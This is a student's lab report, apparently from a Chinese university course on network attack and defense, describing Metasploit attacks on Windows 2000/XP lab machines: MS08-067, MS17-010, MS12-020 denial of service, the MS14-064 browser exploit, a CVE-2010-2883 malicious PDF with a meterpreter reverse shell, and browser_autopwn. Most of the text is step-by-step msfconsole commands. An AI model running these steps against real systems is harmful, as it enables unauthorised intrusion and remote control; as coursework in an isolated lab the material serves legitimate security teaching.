20192431 2021-2022-2 《网络与系统攻防技术》实验六实验报告

实验六 MSF应用

任务1 一个主动攻击实践,尽量使用最新的类似漏洞

靶机:win2000
靶机:winxp
攻击机:kali

  1. 通过nessus扫描以及通过namp --script=vuln ip可以看到win2000有MS08-067,MS12-010.MS03-026等等漏洞。可以看到winxp有MS17-010即永恒之蓝,以及MS09-001等漏洞。

MS08-067

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
靶机为win2k
msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOSTS 172.30.1.206
开始攻击.


结果:成功获得shell

MS17-010

靶机:winxp
过程:利用msf的auxiliary模块进行漏洞验证,看看是不是有445端口这个漏洞。

这里我们可以使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞
use auxiliary/scanner/smb/smb_ms17_010
然后查看具体需要配置的东西
show options

按照需求进行配置。但是要注意,攻击模块的设置一定是要设置为:exploit/windows/smb/ms17_010_psexec该漏洞可用,不然我的电脑不成功。开始设置靶机的ip,端口以及攻击机的ip最后直接进行攻击。


MS12-020

靶机:win2k
从终端进入msf框架:msfconsole
查找漏洞代码:search 12_020
使用这个模块:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids、
查看使用方法:show options
漏洞模块为auxiliary/dos/windows/rdp/ms12_020_maxchannelids
参数为 RHOST目标地址,RPORT目标端口。
运行

任务2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

MS14-064

靶机:winxp
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
msfconsole
search ms14_064
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set SRVHOST 192.168.43.110
set payload
run
会生成一个网页,在winxp当中打开这个网页之后,在kali输入sessions sessions -i 1就可以获取到shell了。
先在winxp当中对ie浏览器进行设置

接下来在kali里面进行search等配置。

在winxp输入这个网址:

在kali中获取:

任务3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

CVE-2010-2883漏洞原理:Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。
影响版本:Adobe Reader 8.2.4 - 9.3.4
①进入 Kali Linux,使用 Metasploit 生成 PDF 木马文件
搜索 Adobe 渗透模块   
search adobe_cooltype_sing 
调用渗透模块   
use exploit/windows/fileformat/adobe_cooltype_sing
查看模块详情   
show options
调用meterpreter载荷,反向连接到渗透机   
set payload windows/meterpreter/reverse_tcp   
设置Kali Linux的IP地址   
set LHOST 192.168.43.110   
设置本地监听端口   
设置带有后门程序的PDF文件   
set FILENAME PINGINGLAB.pdf   
执行渗透生成文件   
exploit
将PDF木马文件拷贝至/home/Kali再拉到桌面
cp /root/.msf4/local/PINGINGLAB.pdf /home/kali/PINGINGLAB.pdf


使用handler监听模块   
use exploit/multi/handler   
回弹一个tcp连接   
set payload windows/meterpreter/reverse_tcp   
设置监听IP地址(跟PDF木马文件一致) 设置监听的端口(跟PDF木马文件一致)开启监听 。
接下来把这个文件拷贝到靶机上,并且用Adobe Reader 9.3打开。就可以获得到这个shell。

任务4 成功应用任何一个辅助模块

  1. 我们在MS17_010的时候已经运用了auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞,并且攻击成功

  2. 使用browser_autopwn 模块渗透攻击浏览器
    Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。
    过程:
    启动MSFCONSOLEmsfconsole
    查询autopwn模块
    使用browser_autopwn模块use auxiliary/server/browser_autopwn
    设置payload。

  3. MS09-001
    使用Metasploit框架,在kali终端输入msfconsole打开Metasploit,过程都是比较相似的,都是搜索。
    结果:

五 遇到的问题

  1. 在VB当中两个虚拟机都设置为桥接模式之后却上不了网了,原因是因为桥接的时候,因为我的机器上还有VMWARE的虚拟机,桥接的时候大概是因为第一桥接到了VMWARE。
    解决办法是,在物理机上把WLAN的VMWARE的勾先去掉。这之后就可以上网了
  2. nessus扫描的时候出现了一个错误就是:Nessus has detected that API access on this scanner is disabled。
    解决办法:原因未知,应该是nessus的一个bug,nessus启动时间过长就会出现这个问题,
    sudo ps -A | grep nessus,Kill掉相关进程,重新进入即可,需要等待较长时间。
    3.MS09-001出现rescue,没有蓝屏,不知道原因是啥。

六 实验感悟

MSF的内容非常多,接下来可以继续实验。

posted @ 2022-05-14 20:56  小小文文  阅读(124)  评论(0编辑  收藏  举报